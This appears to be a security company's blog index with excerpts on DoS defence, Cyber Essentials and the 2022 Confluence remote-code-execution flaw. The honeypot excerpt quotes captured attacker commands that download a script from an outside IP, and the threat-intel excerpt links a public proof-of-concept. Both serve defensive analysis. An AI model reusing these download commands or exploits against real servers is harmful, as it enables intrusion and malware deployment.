Guides

Defending against Denial of Service (DoS) Attacks

What is a DoS Attack?

According to NIST, a denial of service (DoS) is:

“The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided).”

denial of service (DoS) – Glossary | CSRC (nist.gov)

a distributed denial of service (DDoS) is:

“A denial of service technique that uses numerous hosts to perform the attack.”

distributed denial of service (DDoS) – Glossary | CSRC (nist.gov)

Read more “Defending against Denial of Service (DoS) Attacks”
Education

CVE-2022-26134 – Honeypot Payload Analysis Example

Threat actors are deploying a range of payloads to try and leverage vulnerable confluence servers around the globe. This just dropped into one of the pots:

HTTP Command Executes this: 

curl http[:]//202.28.229.174/ap[.]sh?confcurl

This download the following (ap.sh)

$stealz = wget -Uri http[:]//202.28.229[.]174/ap[.]sh?confcurl -UseBasicParsing

$stealz.Content | Out-File ap.txt
Read more “CVE-2022-26134 – Honeypot Payload Analysis Example”
Threat Intel

CVE-2022-26134 – Confluence Zero Day RCE

We are seeing active exploitation in the wild: MIRAI deployment, coinminer deployments etc.

THIS DOES SHOW IN THE ACCESS LOGS! The comment about “what isn’t in the logs” is about POST request BODY not showing in them, not that nothing is logged

https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d/community

XMRIG, KINSING, MIRAI etc. are being deployed by threat actors after exploiting this vulnerability.

This is a fast publish

POC is in the wild: https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/

https://github.com/jbaines-r7/through_the_wire

keep checking vendor guidance and keep checking this for updates… use at own risk etc.

Workaround/Hotfixes have been published by Atlassian:

https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

https://jira.atlassian.com/browse/CONFSERVER-79000

GreyNoise Tag is online: GreyNoise Trends

Also check this out for scanners: GreyNoise

Nice work https://twitter.com/_mattata and all the other people in the cyber community that are working on this!

IT MAY BE WISE TO ASSUME BREACH

The vulnerability appears to be in: xwork-1.0.3-atlassian-10.jar

Background

Velocity discovers a zero-day in confluence 03/06/2022 (GMT)

Read more “CVE-2022-26134 – Confluence Zero Day RCE”
Guides

Cyber Essentials Readiness

So, you have a driver to achieve cyber essentials, great stuff. Now if you are a business of reasonable size and scale this activity requires a bit of planning, context and lots of access and data. This could be via a distributed team or via a dedicated project team. In this post I’m going to look at what you may need to conduct the planning, discovery, assessment, and certification for Cyber Essentials and/or CE+.

Read more “Cyber Essentials Readiness”
Guides

Cyber Essentials – Out of the Box

New machines means it’s easy right?

Ok, another post on cyber essentials! I talk about this quite a lot (mainly driven by procurement requirements rather than orgs expressing a deep desire to “have better security” (which is a shame)) however, I want to show people what the real world is like and that meeting cyber essentials is a good thing, but also to look at real world challenges of meeting the standards. In this post we look at some thought provoking questions, then we look at an out of the box Windows and MAC device to see if they meet the standard!

Read more “Cyber Essentials – Out of the Box”
Copyright (c) Xservus Limited